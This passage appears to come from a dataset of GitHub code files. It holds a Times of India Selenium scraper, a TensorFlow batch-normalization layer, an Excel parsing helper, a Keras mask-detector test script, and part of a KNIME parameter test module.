time.sleep(2)\r\n try:\r\n d['Title']=self.driver.find_element_by_xpath(\"/html/body/div[2]/div/div[3]/div[1]/div[2]/div[1]/h1\").text\r\n except:\r\n d['Title']=self.driver.find_element_by_xpath(\"/html/body/div[2]/div/div[3]/div[1]/div[2]/div[2]/h1\").text\r\n try:\r\n d['Time']=self.driver.find_element_by_xpath(\"/html/body/div[2]/div/div[3]/div[1]/div[2]/div[1]/div/div[1]\").text\r\n except:\r\n d['Time']=self.driver.find_element_by_xpath(\"/html/body/div[2]/div/div[3]/div[1]/div[2]/div[2]/div/div[1]\").text\r\n try:\r\n d['Image']=self.driver.find_element_by_xpath(\"/html/body/div[2]/div/div[3]/div[1]/div[2]/div[2]/section/div/div/img\").get_attribute('src')\r\n except:\r\n d['Image']=self.driver.find_element_by_xpath(\"/html/body/div[2]/div/div[3]/div[1]/div[2]/div[3]/section/div/div/img\").get_attribute('src')\r\n l.append(d)\r\n except:\r\n pass\r\n \r\n return l\r\n\r\n def load_to_database(self):\r\n try:\r\n l=self.get_content()\r\n connect = client(self.svc)\r\n db=connect.internrndd\r\n col = db['timesofindia']\r\n col.insert_many(l)\r\n self.close_drive()\r\n return \"Success\"\r\n except:\r\n self.close_drive()\r\n return \"Error Raised\"\r\n \r\n def close_drive(self):\r\n self.driver.close()","repo_name":"dhanushnayak/InternRnD","sub_path":"Intern/Times_of_india.py","file_name":"Times_of_india.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"12161005138","text":"\"\"\"Implement Layer classes in Tensorflow\"\"\"\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nimport logging\n\nimport tensorflow as tf\n\nimport luchador\nfrom luchador.nn.core.base import fetch_initializer\nfrom .. import wrapper\n\n__all__ = ['BatchNormalization']\n_LG = logging.getLogger(__name__)\n# pylint: disable=no-self-use,no-member,attribute-defined-outside-init\n\n\nclass BatchNormalization(object):\n \"\"\"Implement BatchNormalization in Tensorflow.\n\n See :any:`BaseBatchNormalization` for detail.\n \"\"\"\n def _instantiate_parameters(self, input_shape):\n dim, fmt = len(input_shape), luchador.get_nn_conv_format()\n channel = 1 if dim == 2 or fmt == 'NCHW' else 3\n\n self._axes = tuple(i for i in range(dim) if not i == channel)\n shape = tuple(input_shape[i] for i in range(dim) if i == channel)\n\n const_init = fetch_initializer('ConstantInitializer')\n if self.get_parameter_variable('mean') is None:\n mean = wrapper.make_variable(\n name='mean', shape=shape,\n initializer=const_init(0), trainable=False)\n self.set_parameter_variables(mean=mean)\n\n if self.get_parameter_variable('var') is None:\n var = wrapper.make_variable(\n name='var', shape=shape,\n initializer=const_init(1), trainable=False)\n self.set_parameter_variables(var=var)\n\n if self.get_parameter_variable('scale') is None:\n scale = wrapper.make_variable(\n name='scale', shape=shape, trainable=True,\n initializer=const_init(self.args['scale']))\n self.set_parameter_variables(scale=scale)\n\n if self.get_parameter_variable('offset') is None:\n offset = wrapper.make_variable(\n name='offset', shape=shape, trainable=True,\n initializer=const_init(self.args['offset']))\n self.set_parameter_variables(offset=offset)\n\n def _build(self, input_tensor):\n input_shape = input_tensor.shape\n self._instantiate_parameters(input_shape)\n\n input_ = input_tensor.unwrap()\n decay, epsilon = self.args['decay'], self.args['epsilon']\n\n mean_acc = self.get_parameter_variable('mean').unwrap()\n var_acc = self.get_parameter_variable('var').unwrap()\n scale = self.get_parameter_variable('scale').unwrap()\n offset = self.get_parameter_variable('offset').unwrap()\n\n if self.args['learn']:\n mean_in, var_in = tf.nn.moments(input_, self._axes)\n\n new_mean_acc = decay * mean_acc + (1 - decay) * mean_in\n new_var_acc = decay * var_acc + (1 - decay) * var_in\n\n self._update_operations.append(\n wrapper.Operation(\n op=tf.assign(mean_acc, new_mean_acc),\n name='update_mean',\n )\n )\n self._update_operations.append(\n wrapper.Operation(\n op=tf.assign(var_acc, new_var_acc),\n name='update_var',\n )\n )\n mean_acc = new_mean_acc\n var_acc = new_var_acc\n\n output = tf.nn.batch_normalization(\n x=input_, mean=mean_acc, variance=var_acc, offset=offset,\n scale=scale, variance_epsilon=epsilon)\n return wrapper.Tensor(output, name='output')\n","repo_name":"mthrok/luchador","sub_path":"luchador/nn/core/backend/tensorflow/layer/normalization.py","file_name":"normalization.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"23422356508","text":"import xlrd\nimport numpy as np\n\n\nclass ExcelSheet:\n\n def __init__(self, file_name, **kwargs):\n \"\"\"Initialises the ExcelSheet-Object by parsing the Sheet int a list.\n\n \"\"\"\n try:\n sheet_index = kwargs['sheet_index']\n except KeyError:\n sheet_index = 0\n try:\n wb = xlrd.open_workbook(file_name)\n except FileNotFoundError:\n print(f'File {file_name} not found')\n raise FileNotFoundError\n\n sheet = wb.sheet_by_index(sheet_index)\n self.data = []\n\n for i in range(sheet.nrows):\n row = []\n for j, cell in enumerate(sheet.row_values(i)):\n row.append(cell)\n self.data.append(row)\n\n def __iter__(self):\n \"\"\"Return the iterator of the raw data.\"\"\"\n return iter(self.data)\n\n def iter_row(self, row_index):\n return iter(self.data[row_index])\n\n def iter_col(self, col_index):\n column = []\n for row in self.data:\n column.append(row[col_index])\n return iter(column)\n\n def get_data(self):\n return self.data\n\n # def get_box(self, col, row, shape):\n # col, row = self.resolve_index([col, row])\n # return self.data[row-1:shape[1]][-1]\n\n def get_float_box(self, c, r, **kwargs):\n \"\"\"Return a numpy-array of float values with (c,r) top left corner.\"\"\"\n c, r = self.resolve_index([c, r])\n start = self.get_cell_value_unresolved(c, r)\n if not isinstance(start, float):\n raise TypeError(f'{start} is not an float-Object.')\n shape = self.get_float_box_shape(c, r)\n # print(shape)\n f_box = np.zeros(shape, dtype=float)\n # print(f_box)\n for rnum in range(shape[0]):\n for cnum in range(shape[1]):\n try:\n # print(self.get_cell_value_unresolved(\n # c+cnum, r+rnum))\n f_box[rnum, cnum] = self.get_cell_value_unresolved(\n c+cnum, r+rnum)\n except TypeError:\n print(f'\\\"{self.get_cell_value_unresolved(c+cnum, r+rnum)}\\\" cannot be converted to float')\n f_box[rnum, cnum] = None\n except ValueError:\n print(f'\\\"{self.get_cell_value_unresolved(c+cnum, r+rnum)}\\\" cannot be converted to float')\n f_box[rnum, cnum] = None\n try:\n header_shape = [shape[0], 1]\n header_shape[1] = kwargs['header_shape']\n header = self.get_header(c, r, header_shape)\n return f_box, header\n except KeyError:\n return f_box\n\n def get_header(self, c, r, h_shape):\n print(h_shape)\n header = np.zeros(h_shape, dtype='= 97 and ascii_char <= 122:\n return ascii_char-97\n elif ascii_char >= 65 and ascii_char <= 90:\n return ascii_char-65\n else:\n raise TypeError(f'{char} is not a valid character.')\n\n def __str__(self):\n s = ''\n for row in self.data:\n s += str(row[0])\n for cell in row[1:]:\n s += ',' + str(cell)\n s += '\\n'\n return s\n\n\ndef main():\n es = ExcelSheet('Diffusion.xlsx')\n data = es.get_float_box('A', 8)\n print(data)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"h-mnzlr/physicsgoe","sub_path":"tools/excels.py","file_name":"excels.py","file_ext":"py","file_size_in_byte":5127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40329052238","text":"import os, re, glob\nimport cv2\nimport numpy as np\nimport shutil\nfrom keras.models import load_model\n\ndef Dataization(img_path):\n img = cv2.imread(img_path)\n return (img / 256)\n\n\nsrc = []\nname = []\ntest = []\nimage_dir = 'test_data/'\nfor file in os.listdir(image_dir):\n if (file.find('.jpg') is not -1):\n src.append(image_dir + file)\n name.append(file)\n test.append(Dataization(image_dir + file))\n\ntest = np.array(test)\nprint(test.shape)\nmodel = load_model('6LBMIv2-20.h5')\npredict = model.predict(test)\nprint(predict.shape)\nprint(\"ImageName : , Predict : [mask, nomask]\")\nfor i in range(len(test)):\n print(name[i] + \" : , Predict : \" + str(predict[i]))","repo_name":"SeongMin2/COVID-19-Face-mask-detector","sub_path":"Model_Test.py","file_name":"Model_Test.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"73518679926","text":"import unittest\nimport knime.extension.parameter as kp\nimport knime.api.schema as ks\nimport knime.extension.nodes as kn\n\ntest_schema = ks.Schema.from_columns(\n [\n ks.Column(\n ks.int32(),\n \"IntColumn\",\n {\n \"preferred_value_type\": \"org.knime.core.IntValue\",\n \"displayed_column_type\": \"Integer\",\n },\n ),\n ks.Column(\n ks.double(),\n \"DoubleColumn\",\n {\n \"preferred_value_type\": \"org.knime.core.DoubleValue\",\n \"displayed_column_type\": \"Double\",\n },\n ),\n ks.Column(\n ks.string(),\n \"StringColumn\",\n {\n \"preferred_value_type\": \"org.knime.core.StringValue\",\n \"displayed_column_type\": \"String\",\n },\n ),\n ks.Column(\n ks.list_(ks.int64()),\n \"LongListColumn\",\n {\n \"preferred_value_type\": \"org.knime.core.data.collection.ListDataValue\",\n \"displayed_column_type\": \"Long List\",\n },\n ),\n ]\n)\n\ntest_possible_values = [\n {\n \"id\": \"IntColumn\",\n \"text\": \"IntColumn\",\n \"type\": {\"id\": \"org.knime.core.IntValue\", \"text\": \"Integer\"},\n \"compatibleTypes\": [\"org.knime.core.IntValue\"],\n },\n {\n \"id\": \"DoubleColumn\",\n \"text\": \"DoubleColumn\",\n \"type\": {\"id\": \"org.knime.core.DoubleValue\", \"text\": \"Double\"},\n \"compatibleTypes\": [\"org.knime.core.DoubleValue\"],\n },\n {\n \"id\": \"StringColumn\",\n \"text\": \"StringColumn\",\n \"type\": {\"id\": \"org.knime.core.StringValue\", \"text\": \"String\"},\n \"compatibleTypes\": [\"org.knime.core.StringValue\"],\n },\n {\n \"id\": \"LongListColumn\",\n \"text\": \"LongListColumn\",\n \"type\": {\n \"id\": \"org.knime.core.data.collection.ListDataValue\",\n \"text\": \"Long List\",\n },\n \"compatibleTypes\": [\"org.knime.core.data.collection.ListDataValue\"],\n },\n]\n\n\ndef generate_values_dict(\n int_param=3,\n double_param=1.5,\n string_param=\"foo\",\n multiline_string_param=\"foo\\nbar\",\n bool_param=True,\n column_param=\"foo_column\",\n multi_column_param=[\"foo_column\", \"bar_column\"],\n full_multi_column_param=kp.ColumnFilterConfig(\n included_column_names=[\"foo_column\", \"bar_column\"]\n ),\n first=1,\n second=5,\n third=3,\n):\n return {\n \"model\": {\n \"int_param\": int_param,\n \"double_param\": double_param,\n \"string_param\": string_param,\n \"multiline_string_param\": multiline_string_param,\n \"bool_param\": bool_param,\n \"column_param\": column_param,\n \"multi_column_param\": multi_column_param,\n \"full_multi_column_param\": full_multi_column_param._to_dict(),\n \"parameter_group\": {\n \"subgroup\": {\"first\": first, \"second\": second},\n \"third\": third,\n },\n }\n }\n\n\ndef generate_values_dict_without_groups(\n int_param=3,\n double_param=1.5,\n string_param=\"foo\",\n bool_param=True,\n column_param=\"foo_column\",\n multi_column_param=[\"foo_column\", \"bar_column\"],\n full_multi_column_param=kp.ColumnFilterConfig(\n included_column_names=[\"foo_column\", \"bar_column\"]\n ),\n):\n return {\n \"model\": {\n \"int_param\": int_param,\n \"double_param\": double_param,\n \"string_param\": string_param,\n \"bool_param\": bool_param,\n \"column_param\": column_param,\n \"multi_column_param\": multi_column_param,\n \"full_multi_column_param\": full_multi_column_param._to_dict(),\n }\n }\n\n\ndef generate_values_dict_with_one_group(\n int_param=3,\n double_param=1.5,\n string_param=\"foo\",\n bool_param=True,\n column_param=\"foo_column\",\n multi_column_param=[\"foo_column\", \"bar_column\"],\n full_multi_column_param=kp.ColumnFilterConfig(\n included_column_names=[\"foo_column\", \"bar_column\"]\n ),\n first=3,\n second=5,\n):\n return {\n \"model\": {\n \"int_param\": int_param,\n \"double_param\": double_param,\n \"string_param\": string_param,\n \"bool_param\": bool_param,\n \"column_param\": column_param,\n \"multi_column_param\": multi_column_param,\n \"full_multi_column_param\": full_multi_column_param._to_dict(),\n \"parameter_group\": {\n \"first\": first,\n \"second\": second,\n },\n }\n }\n\n\ndef generate_values_dict_for_group_w_custom_method(\n outer_int_param=0, middle_int_param=1, inner_int_param=2, inner_int_param2=2\n):\n return {\n \"model\": {\n \"outer_group\": {\n \"outer_int_param\": outer_int_param,\n \"middle_group\": {\n \"middle_int_param\": middle_int_param,\n \"inner_group\": {\n \"inner_int_param\": inner_int_param,\n \"inner_int_param2\": inner_int_param2,\n },\n },\n }\n }\n }\n\n\ndef set_column_parameters(parameterized_object):\n parameterized_object.column_param = \"foo_column\"\n parameterized_object.multi_column_param = [\"foo_column\", \"bar_column\"]\n parameterized_object.full_multi_column_param = kp.ColumnFilterConfig(\n included_column_names=[\"foo_column\", \"bar_column\"]\n )\n\n\ndef generate_versioned_values_dict(\n int_param=3,\n double_param=1.5,\n string_param=\"foo\",\n bool_param=True,\n first=1,\n second=5,\n extension_version=None,\n):\n model = {}\n if extension_version is None:\n model = {\n \"int_param\": int_param,\n \"double_param\": double_param,\n \"string_param\": string_param,\n \"bool_param\": bool_param,\n \"group\": {\"first\": first, \"second\": second},\n }\n else:\n if extension_version == \"0.1.0\":\n model = {\n \"int_param\": int_param,\n \"double_param\": double_param,\n }\n elif extension_version == \"0.2.0\":\n model = {\n \"int_param\": int_param,\n \"double_param\": double_param,\n \"string_param\": string_param,\n \"group\": {\"first\": first},\n }\n elif extension_version == \"0.3.0\":\n model = {\n \"int_param\": int_param,\n \"double_param\": double_param,\n \"string_param\": string_param,\n \"bool_param\": bool_param,\n \"group\": {\"first\": first, \"second\": second},\n }\n return {\"model\": model}\n\n\ndef generate_versioned_schema_dict(extension_version):\n if extension_version == \"0.1.0\":\n return {\n \"type\": \"object\",\n \"properties\": {\n \"model\": {\n \"type\": \"object\",\n \"properties\": {\n \"int_param\": {\n \"title\": \"Int Parameter\",\n \"description\": \"An integer parameter\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n \"double_param\": {\n \"title\": \"Double Parameter\",\n \"description\": \"A double parameter\",\n \"type\": \"number\",\n \"format\": \"double\",\n },\n },\n }\n },\n }\n elif extension_version == \"0.2.0\":\n return {\n \"type\": \"object\",\n \"properties\": {\n \"model\": {\n \"type\": \"object\",\n \"properties\": {\n \"int_param\": {\n \"title\": \"Int Parameter\",\n \"description\": \"An integer parameter\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n \"double_param\": {\n \"title\": \"Double Parameter\",\n \"description\": \"A double parameter\",\n \"type\": \"number\",\n \"format\": \"double\",\n },\n \"string_param\": {\n \"title\": \"String Parameter\",\n \"description\": \"A string parameter\",\n \"type\": \"string\",\n },\n \"group\": {\n \"type\": \"object\",\n \"properties\": {\n \"first\": {\n \"title\": \"First Parameter\",\n \"description\": \"First parameter description\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n }\n },\n },\n },\n }\n },\n }\n elif extension_version == \"0.3.0\":\n return {\n \"type\": \"object\",\n \"properties\": {\n \"model\": {\n \"type\": \"object\",\n \"properties\": {\n \"int_param\": {\n \"title\": \"Int Parameter\",\n \"description\": \"An integer parameter\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n \"double_param\": {\n \"title\": \"Double Parameter\",\n \"description\": \"A double parameter\",\n \"type\": \"number\",\n \"format\": \"double\",\n },\n \"string_param\": {\n \"title\": \"String Parameter\",\n \"description\": \"A string parameter\",\n \"type\": \"string\",\n },\n \"bool_param\": {\n \"title\": \"Boolean Parameter\",\n \"description\": \"A boolean parameter\",\n \"type\": \"boolean\",\n },\n \"group\": {\n \"type\": \"object\",\n \"properties\": {\n \"first\": {\n \"title\": \"First Parameter\",\n \"description\": \"First parameter description\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n \"second\": {\n \"title\": \"Second Parameter\",\n \"description\": \"Second parameter description\",\n \"type\": \"integer\",\n \"format\": \"int32\",\n },\n },\n },\n },\n }\n },\n }\n\n\n#### Primary parameterised object and its groups for testing main functionality: ####\n@kp.parameter_group(\"Subgroup\")\nclass NestedParameterGroup:\n \"\"\"\n A parameter group where the sum of the parameters may not exceed 10.\n Is a subgroup of an external parameter group.\n \"\"\"\n\n first = kp.IntParameter(\n label=\"First Parameter\",\n description=\"First parameter description\",\n default_value=1,\n )\n second = kp.IntParameter(\n label=\"Second Parameter\",\n description=\"Second parameter description\",\n default_value=5,\n )\n\n def validate(self, values):\n if values[\"first\"] + values[\"second\"] > 100:\n raise ValueError(\n \"The sum of the parameters of subgroup must not exceed 100.\"\n )\n\n\n@kp.parameter_group(\"Primary Group\")\nclass ParameterGroup:\n \"\"\"A parameter group which contains a parameter group as a subgroup, and sets a custom validator for a parameter.\"\"\"\n\n subgroup = NestedParameterGroup()\n third = kp.IntParameter(\n label=\"Internal int Parameter\",\n description=\"Internal int parameter description\",\n default_value=3,\n )\n\n @third.validator\n def int_param_validator(value):\n if value < 0:\n raise ValueError(\"The third parameter must be positive.\")\n\n @subgroup.validator(override=False)\n def validate_subgroup(values, version=None):\n if values[\"first\"] + values[\"second\"] < 0:\n raise ValueError(\"The sum of the parameters must be non-negative.\")\n elif values[\"first\"] == 42:\n raise ValueError(\"Detected a forbidden number.\")\n\n\n@kp.parameter_group(\"Primary Group Advanced\", is_advanced=True)\nclass ParameterGroupAdvanced:\n \"\"\"A parameter group which contains a parameter group as a subgroup, has is_advanced set True,\n and sets a custom validator for a parameter.\"\"\"\n\n subgroup = NestedParameterGroup()\n third = kp.IntParameter(\n label=\"Internal int Parameter\",\n description=\"Internal int parameter description\",\n default_value=3,\n )\n\n @third.validator\n def int_param_validator(value):\n if value < 0:\n raise ValueError(\"The third parameter must be positive.\")\n\n @subgroup.validator(override=False)\n def validate_subgroup(values, version=None):\n if values[\"first\"] + values[\"second\"] < 0:\n raise ValueError(\"The sum of the parameters must be non-negative.\")\n elif values[\"first\"] == 42:\n raise ValueError(\"Detected a forbidden number.\")\n\n\nclass Parameterized:\n int_param = kp.IntParameter(\"Int Parameter\", \"An integer parameter\", 3)\n double_param = kp.DoubleParameter(\"Double Parameter\", \"A double parameter\", 1.5)\n string_param = kp.StringParameter(\"String Parameter\", \"A string parameter\", \"foo\")\n multiline_string_param = kp.MultilineStringParameter(\n \"Multiline String Parameter\",\n \"A multiline string parameter\",\n \"foo\\nbar\",\n number_of_lines=5,\n )\n bool_param = kp.BoolParameter(\"Boolean Parameter\", \"A boolean parameter\", True)\n column_param = kp.ColumnParameter(\"Column Parameter\", \"A column parameter\")\n multi_column_param = kp.MultiColumnParameter(\n \"Multi Column Parameter\",\n \"A multi column parameter\",\n )\n full_multi_column_param = kp.ColumnFilterParameter(\n \"Full Multi Column Parameter\",\n \"A full multi column parameter\",\n )\n\n parameter_group = ParameterGroup()\n\n @string_param.validator\n def validate_string_param(value):\n if len(value) > 10:\n raise ValueError(f\"Length of string must not exceed 10!\")\n\n\nclass ParameterizedIndentation:\n indented_spaces_enum = kp.EnumParameter(\n label=\"Indented Enum Parameter\",\n description=\"\"\"\n Any Text\n \"\"\",\n default_value=\"txt\",\n )\n indented_tabs_enum = kp.EnumParameter(\n label=\"Indented Enum Parameter\",\n description=\"\"\"\n\\t\\tAny Text\n\\t\\t\"\"\",\n default_value=\"txt\",\n )\n\n\nclass ParameterizedWithOneGroup:\n int_param = kp.IntParameter(\"Int Parameter\", \"An integer parameter\", 3)\n double_param = kp.DoubleParameter(\"Double Parameter\", \"A double parameter\", 1.5)\n string_param = kp.StringParameter(\"String Parameter\", \"A string parameter\", \"foo\")\n bool_param = kp.BoolParameter(\"Boolean Parameter\", \"A boolean parameter\", True)\n column_param = kp.ColumnParameter(\"Column Parameter\", \"A column parameter\")\n multi_column_param = kp.MultiColumnParameter(\n \"Multi Column Parameter\",\n \"A multi column parameter\",\n )\n full_multi_column_param = kp.ColumnFilterParameter(\n \"Full Multi Column Parameter\",\n \"A full multi column parameter\",\n )\n parameter_group = NestedParameterGroup()\n\n @string_param.validator\n def validate_string_param(value):\n if len(value) > 10:\n raise ValueError(f\"Length of string must not exceed 10!\")\n\n\nclass ParameterizedWithAdvancedOption:\n int_param = kp.IntParameter(\"Int Parameter\", \"An integer parameter\", 3)\n int_advanced_param = kp.IntParameter(\n \"Int Parameter\", \"An integer parameter\", 3, is_advanced=True\n )\n\n double_param = kp.DoubleParameter(\"Double Parameter\", \"A double parameter\", 1.5)\n double_advanced_param = kp.DoubleParameter(\n \"Double Parameter\", \"A double parameter\", 1.5, is_advanced=True\n )\n\n string_param = kp.StringParameter(\"String Parameter\", \"A string parameter\", \"foo\")\n string_advanced_param = kp.StringParameter(\n \"String Parameter\", \"A string parameter\", \"foo\", is_advanced=True\n )\n multiline_string_param = kp.MultilineStringParameter(\n \"Multiline String Parameter\",\n \"A multiline string parameter\",\n \"foo\\nbar\",\n number_of_lines=5,\n )\n multiline_string_advanced_param = kp.MultilineStringParameter(\n \"Multiline String Parameter\",\n \"A multiline string parameter\",\n \"foo\\nbar\",\n number_of_lines=5,\n is_advanced=True,\n )\n bool_param = kp.BoolParameter(\"Boolean Parameter\", \"A boolean parameter\", True)\n bool_advanced_param = kp.BoolParameter(\n \"Boolean Parameter\", \"A boolean parameter\", True, is_advanced=True\n )\n\n column_param = kp.ColumnParameter(\"Column Parameter\", \"A column parameter\")\n column_advanced_param = kp.ColumnParameter(\n \"Column Parameter\", \"A column parameter\", is_advanced=True\n )\n\n multi_column_param = kp.MultiColumnParameter(\n \"Multi Column Parameter\",\n \"A multi column parameter\",\n )\n multi_column_advanced_param = kp.MultiColumnParameter(\n \"Multi Column Parameter\", \"A multi column parameter\", is_advanced=True\n )\n full_multi_column_param = kp.ColumnFilterParameter(\n \"Full Multi Column Parameter\",\n \"A full multi column parameter\",\n )\n full_multi_column_param = kp.ColumnFilterParameter(\n \"Full Multi Column Parameter\", \"A full multi column parameter\", is_advanced=True\n )\n parameter_group = ParameterGroup()\n parameter_group_advanced = ParameterGroupAdvanced()\n\n\nclass ParameterizedWithoutGroup:\n int_param = kp.IntParameter(\"Int Parameter\", \"An integer parameter\", 3)\n double_param = kp.DoubleParameter(\"Double Parameter\", \"A double parameter\", 1.5)\n string_param = kp.StringParameter(\"String Parameter\", \"A string parameter\", \"foo\")\n bool_param = kp.BoolParameter(\"Boolean Parameter\", \"A boolean parameter\", True)\n column_param = kp.ColumnParameter(\"Column Parameter\", \"A column parameter\")\n multi_column_param = kp.MultiColumnParameter(\n \"Multi Column Parameter\",\n \"A multi column parameter\",\n )\n full_multi_column_param = kp.ColumnFilterParameter(\n \"Full Multi Column Parameter\",\n \"A full multi column parameter\",\n )\n\n\n#### Secondary parameterised objects for testing composition: ####\n@kp.parameter_group(\"Parameter group to be used for multiple descriptor instances.\")\nclass ReusableGroup:\n first_param = kp.IntParameter(\n label=\"Plain int param\",\n description=\"Description of the plain int param.\",\n default_value=12345,\n )\n second_param = kp.IntParameter(\n label=\"Second int param\",\n description=\"Description of the second plain int param.\",\n default_value=54321,\n )\n\n @classmethod\n def create_default_dict(cls):\n return {\"first_param\": 12345, \"second_param\": 54321}\n\n\nclass ComposedParameterized:\n def __init__(self) -> None:\n # Instantiated here for brevety. Usually these would be supplied as arguments to __init__\n self.first_group = ReusableGroup()\n self.second_group = ReusableGroup()\n\n\n@kp.parameter_group(\"Nested composed\")\nclass NestedComposed:\n def __init__(self) -> None:\n self.first_group = ReusableGroup()\n self.second_group = ReusableGroup()\n\n @classmethod\n def create_default_dict(cls):\n return {\n \"first_group\": ReusableGroup.create_default_dict(),\n \"second_group\": ReusableGroup.create_default_dict(),\n }\n\n\nclass NestedComposedParameterized:\n def __init__(self) -> None:\n self.group = NestedComposed()\n\n @classmethod\n def create_default_dict(cls):\n return {\"model\": {\"group\": NestedComposed.create_default_dict()}}\n\n\n@kp.parameter_group(\"Nested group\")\nclass NestedNestedParameters:\n nested_root_param = kp.StringParameter(\n \"Nested root param\",\n \"Nested root param.\",\n \"blah\",\n )\n\n def __init__(self, new_value):\n self.nested_init_param = kp.StringParameter(\n \"Nested init param\",\n \"Nested init param.\",\n new_value,\n )\n\n\n@kp.parameter_group(\"Root group\")\nclass NestedParameters:\n group_root_param = kp.StringParameter(\n \"Group root param\",\n \"Group root param.\",\n \"blah\",\n )\n\n group_root_nested = NestedNestedParameters(\"blah\")\n\n def __init__(self, new_value):\n self.new_constructor_param = kp.StringParameter(\n \"Root group init param\",\n \"Root group init param.\",\n new_value,\n )\n self.group_init_nested = NestedNestedParameters(\"blah\")\n\n\nclass ComplexNestedComposedParameterized:\n root_param = kp.StringParameter(\"Root param\", \"Root param.\", \"blah\")\n\n root_group = NestedParameters(\"blah\")\n\n def __init__(self):\n self.init_group = NestedParameters(\"blah\")\n\n @classmethod\n def get_expected_params(cls):\n return {\n \"model\": {\n \"root_param\": \"blah\",\n \"root_group\": {\n \"group_root_param\": \"blah\",\n \"group_root_nested\": {\n \"nested_root_param\": \"blah\",\n \"nested_init_param\": \"blah\",\n },\n \"new_constructor_param\": \"blah\",\n \"group_init_nested\": {\n \"nested_root_param\": \"blah\",\n \"nested_init_param\": \"blah\",\n },\n },\n \"init_group\": {\n \"group_root_param\": \"blah\",\n \"group_root_nested\": {\n \"nested_root_param\": \"blah\",\n \"nested_init_param\": \"blah\",\n },\n \"new_constructor_param\": \"blah\",\n \"group_init_nested\": {\n \"nested_root_param\": \"blah\",\n \"nested_init_param\": \"blah\",\n },\n },\n }\n }\n\n\n@kp.parameter_group(\"Versioned parameter group\")\nclass VersionedParameterGroup:\n first = kp.IntParameter(\n label=\"First Parameter\",\n description=\"First parameter description\",\n default_value=1,\n since_version=\"0.2.0\",\n )\n second = kp.IntParameter(\n label=\"Second Parameter\",\n description=\"Second parameter description\",\n default_value=5,\n since_version=\"0.3.0\",\n )\n\n\nclass VersionedParameterized:\n # no since_version specified defaults to it being \"0.0.0\"\n int_param = kp.IntParameter(\"Int Parameter\", \"An integer parameter\", 3)\n double_param = kp.DoubleParameter(\n \"Double Parameter\", \"A double parameter\", 1.5, since_version=\"0.1.0\"\n )\n string_param = kp.StringParameter(\n \"String Parameter\", \"A string parameter\", \"foo\", since_version=\"0.2.0\"\n )\n bool_param = kp.BoolParameter(\n \"Boolean Parameter\", \"A boolean parameter\", True, since_version=\"0.3.0\"\n )\n\n group = VersionedParameterGroup(since_version=\"0.2.0\")\n\n\n@kp.parameter_group(\"\", since_version=\"0.2.0\")\nclass VersionedDefaultsParameterGroup:\n first = kp.IntParameter(\n \"\",\n \"\",\n lambda v: -1 if v < kp.Version(0, 1, 0) else 1,\n )\n\n\nclass VersionedDefaultsParameterized:\n int_param = kp.IntParameter(\"Int Parameter\", \"An integer parameter\", 3)\n\n double_param = kp.DoubleParameter(\n \"Double Parameter\",\n \"\",\n lambda v: 1.5 if v >= kp.Version(0, 1, 0) else 0.5,\n since_version=\"0.2.0\",\n )\n\n group = VersionedDefaultsParameterGroup()\n\n\n#### Parameterised object for testing parameter groups with additional methods defined by the developer ####\n@kp.parameter_group(\"Inner group with a custom method\")\nclass InnerGroupWCustomMethod:\n inner_int_param = kp.IntParameter(\"Inner int\", \"Inner int parameter\", 2)\n inner_int_param2 = kp.IntParameter(\n \"Second inner int\", \"Second inner int parameter\", 2\n )\n\n def inner_foo(self):\n return self.inner_int_param + self.inner_int_param2 # 2 + 2 = 4\n\n def validate(self, values):\n if values[\"inner_int_param\"] != values[\"inner_int_param2\"]:\n raise ValueError(\"Inner int parameters should always be equal.\")\n\n\n@kp.parameter_group(\"Middle group with a custom method\")\nclass MiddleGroupWCustomMethod:\n middle_int_param = kp.IntParameter(\"Middle int\", \"Middle int parameter\", 1)\n inner_group = InnerGroupWCustomMethod()\n\n def middle_foo(self):\n return self.middle_int_param + self.inner_group.inner_foo() # 1 + (2 + 2) = 5\n\n\n@kp.parameter_group(\"Outer group with a custom method\")\nclass OuterGroupWCustomMethod:\n outer_int_param = kp.IntParameter(\"Outer int\", \"Outer int parameter\")\n middle_group = MiddleGroupWCustomMethod()\n\n def recursive_method(self, bar):\n if bar > 4:\n return self.middle_group.middle_foo() # 5\n else:\n return 1 + self.recursive_method(\n bar + 1\n ) # 1 + (1 + (1 + (1 + (1 + 5)))) = 10\n\n def nested_method(self):\n return self.middle_group.inner_group.inner_foo() # 4\n\n def _protected_method(self):\n return \"bar\"\n\n @middle_group.validator\n def validate_middle_group(values):\n if values[\"middle_int_param\"] > values[\"inner_group\"][\"inner_int_param\"]:\n raise ValueError(\n \"Middle parameter should be smaller than inner int parameter.\"\n )\n\n\nclass ParameterizedWithCustomMethods:\n outer_group = OuterGroupWCustomMethod()\n\n\n@kp.parameter_group(\n \"Subgroup that assigns values to params inside its constructor call\"\n)\nclass SubgroupWithConstructor:\n inner_param = kp.IntParameter(\"Param\", \"Param description.\", 12345)\n\n def __init__(self, param):\n self.inner_param = param\n\n\n@kp.parameter_group(\"Group that assigns values to params inside its constructor call\")\nclass GroupWithConstructor:\n param = kp.IntParameter(\"Param\", \"Param description.\", 12345)\n\n def __init__(self, param):\n self.param = param\n\n # a non-descriptor group\n self.subgroup = SubgroupWithConstructor(param=69)\n\n\nclass ParameterizedUsingConstructor:\n group = GroupWithConstructor(param=42)\n\n\n@kp.parameter_group(\"Subgroup with an inner class.\")\nclass SubgroupWithInnerClass:\n class InnerClass:\n attr_1 = 1\n attr_2 = 100\n\n @classmethod\n def _some_inner_method(cls):\n return cls.attr_2\n\n inner_param = kp.IntParameter(\"Inner param\", \"Inner param description.\", 12345)\n\n def __init__(self, param=InnerClass._some_inner_method()):\n self.inner_param = param + self.InnerClass.attr_1\n\n\n@kp.parameter_group(\"Group that calls its subgroup's inner class methods\")\nclass GroupCallingInnerClass:\n param 